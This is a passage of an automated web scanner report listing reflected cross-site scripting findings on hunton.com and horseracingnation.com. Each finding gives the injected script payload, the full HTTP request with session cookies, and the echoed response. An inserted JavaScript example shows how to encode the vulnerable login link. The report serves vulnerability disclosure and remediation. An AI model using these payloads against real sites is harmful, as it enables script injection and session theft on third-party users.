<a href="/navigation/contact_us.asp?id=lbmc7284e"><script>alert(1)</script>0b95bf251de&email=tmangrum%40lbmc%2Ecom&content=contact_us.asp"
onclick="parent.frames[1].location='/ContentPages/nav_contact_us.html'"
target="mainbody" onmouseover="HoverCraft('Image3', Image3On.src);"
onmou
...[SNIP]...

5.127. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.horseracingnation.com
Path:   /polls/current/kentucky_derby_2011_contenders

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b18"style%3d"x%3aexpression(alert(1))"faaebfffd82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4b18"style="x:expression(alert(1))"faaebfffd82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /polls/current/kentucky_derby_2011_contenders?e4b18"style%3d"x%3aexpression(alert(1))"faaebfffd82=1 HTTP/1.1
Host: www.horseracingnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 20:46:15 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 283129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_MasterPageHTMLTag" xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href="/login.aspx?ReturnUrl=/polls/current/kentucky_derby_2011_contenders?e4b18"style="x:expression(alert(1))"faaebfffd82=1" id="ctl00_ctl00_uxLoginCtrl_uxLoginView_loginlink" class="login-popup-link">
...[SNIP]...

5.128. http://www.horseracingnation.com/probables/probables.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.horseracingnation.com
Path:   /probables/probables.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20fe5"><script>alert(1)</script>f0627898df7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /probables/probables.aspx?20fe5"><script>alert(1)</script>f0627898df7=1 HTTP/1.1
Host: www.horseracingnation.com
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=ab4ad5e220ff72e6:T=1304800633:S=ALNI_MZcIMcQlkcHFyO62ajydfCFp96nmA; __utmz=187249457.1304818652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=187249457.1073006542.1304818631.1304818631.1304818631.1; __utmc=187249457; __utmb=187249457.1.10.1304818631

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 07 May 2011 20:48:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 934409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_MasterPageHTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml
...[SNIP]...
<a href="/login.aspx?ReturnUrl=/probables/probables.aspx?20fe5"><script>alert(1)</script>f0627898df7=1" id="ctl00_uxLoginCtrl_uxLoginView_loginlink" class="login-popup-link">
...[SNIP]...
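
Findings 5.127 and 5.128 both come from the login link copying the raw request URL, parameter names included, into ReturnUrl. As an added example (not the site's code), the fragment below rebuilds that link from the parsed request in JavaScript, using Node's WHATWG URL and URLSearchParams, with the raw-echo version beside it for comparison. The href template, the localhost base used only for parsing, and the function names are assumptions; the two query strings are the recorded requests.

```javascript
// Added example: building the login ReturnUrl link without echoing the raw
// request URL. The href template and function names are hypothetical
// stand-ins for the ASP.NET pages in findings 5.127 and 5.128.

// Request-targets exactly as recorded in the two findings (constructed input).
const RECORDED_REQUESTS = [
  '/polls/current/kentucky_derby_2011_contenders?e4b18"style="x:expression(alert(1))"faaebfffd82=1',
  '/probables/probables.aspx?20fe5"><script>alert(1)</script>f0627898df7=1',
];

// HTML attribute context: entity-encode the five metacharacters.
function encodeForHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// What the responses above do: the request URL goes into the attribute verbatim,
// so a parameter *name* carrying " or < breaks out of href.
function renderLoginLinkVulnerable(requestUrl) {
  return '<a href="/login.aspx?ReturnUrl=' + requestUrl + '" class="login-popup-link">';
}

// Rebuild the return target from parsed components. Every parameter name and
// value is re-serialised by URLSearchParams, so attacker-controlled names come
// back percent-encoded instead of verbatim. Only pathname is kept, so the
// rebuilt target always starts with a single "/" and cannot name another host.
function buildReturnUrl(requestUrl) {
  const u = new URL(requestUrl, 'http://localhost'); // base exists only to parse a relative target
  const qs = new URLSearchParams(u.searchParams).toString();
  return u.pathname + (qs ? '?' + qs : '');
}

// The rebuilt target is itself one query value of /login.aspx, so it is
// percent-encoded once more as a component, and the finished href is
// HTML-encoded for the attribute it lands in.
function renderLoginLink(requestUrl) {
  const href = '/login.aspx?ReturnUrl=' + encodeURIComponent(buildReturnUrl(requestUrl));
  return '<a href="' + encodeForHtmlAttr(href) + '" class="login-popup-link">';
}
```

renderLoginLinkVulnerable(RECORDED_REQUESTS[1]) reproduces the `"><script>alert(1)</script>` breakout seen in the 5.128 response, while renderLoginLink on the same input yields an href containing only percent-encoded characters, and buildReturnUrl alone shows the intermediate form in which the injected name survives only as e4b18%22style. The double percent-encoding (%2522) is intentional: the login page decodes ReturnUrl once and gets back the single-encoded, parser-safe target.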

5.129. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b3304<script>alert(1)</script>126556c9ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs&b3304<script>alert(1)</script>126556c9ed9=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:25 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/aboutus/uniGC.aspx?xpST=AboutUs&b3304<script>alert(1)</script>126556c9ed9=1&pdf=yes</div>
...[SNIP]...

5.130. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /alan_kailer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7874<script>alert(1)</script>67ed776ea04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alan_kailer/?d7874<script>alert(1)</script>67ed776ea04=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46467


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/professionals/uniEntity.aspx?d7874<script>alert(1)</script>67ed776ea04=1&xpST=ProfessionalDetailPDF&professional=4984&pdf=yes</div>
...[SNIP]...

5.131. http://www.hunton.com/dallas-united-states-of-america/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /dallas-united-states-of-america/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 85671<script>alert(1)</script>da71c94b3eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dallas-united-states-of-america/?85671<script>alert(1)</script>da71c94b3eb=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:33 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1853; path=/
Set-Cookie: PortletId=5990402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42545


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/locations/uniEntity.aspx?85671<script>alert(1)</script>da71c94b3eb=1&xpST=OfficeDetail&office=6&pdf=yes</div>
...[SNIP]...

5.132. http://www.hunton.com/disclaimer/uniGC.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /disclaimer/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c62ea<script>alert(1)</script>b61219ade15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disclaimer/uniGC.aspx?xpST=Disclaimer&c62ea<script>alert(1)</script>b61219ade15=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:13:00 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1855; path=/
Set-Cookie: PortletId=5992402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50878


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/disclaimer/uniGC.aspx?xpST=Disclaimer&c62ea<script>alert(1)</script>b61219ade15=1&pdf=yes</div>
...[SNIP]...

5.133. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a456e<script>alert(1)</script>c6ecfef4a6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/uniGC.aspx?xpST=PENSearch&a456e<script>alert(1)</script>c6ecfef4a6c=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:02 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=3274fdb8-62f1-4551-b6d0-d1d666f3e788; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch&a456e<script>alert(1)</script>c6ecfef4a6c=1&pdf=yes</div>
...[SNIP]...

5.134. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /news/uniGC.aspx

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload d2516<script>alert(1)</script>da9dcb68d27 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/uniGC.aspx?xpST=PENSearch&nsextt=%27%3E%3Cscript%3Enetsparker(9)%3C/script%3Ed2516<script>alert(1)</script>da9dcb68d27 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:44:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1849; path=/
Set-Cookie: PortletId=5986402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
</script>d2516<script>alert(1)</script>da9dcb68d27&pdf=yes</div>
...[SNIP]...

5.135. http://www.hunton.com/private_wealth_advisors/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /private_wealth_advisors/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7cf20<script>alert(1)</script>3a817fcf669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /private_wealth_advisors/?7cf20<script>alert(1)</script>3a817fcf669=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/services/uniGC.aspx?xpST=ServiceList
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
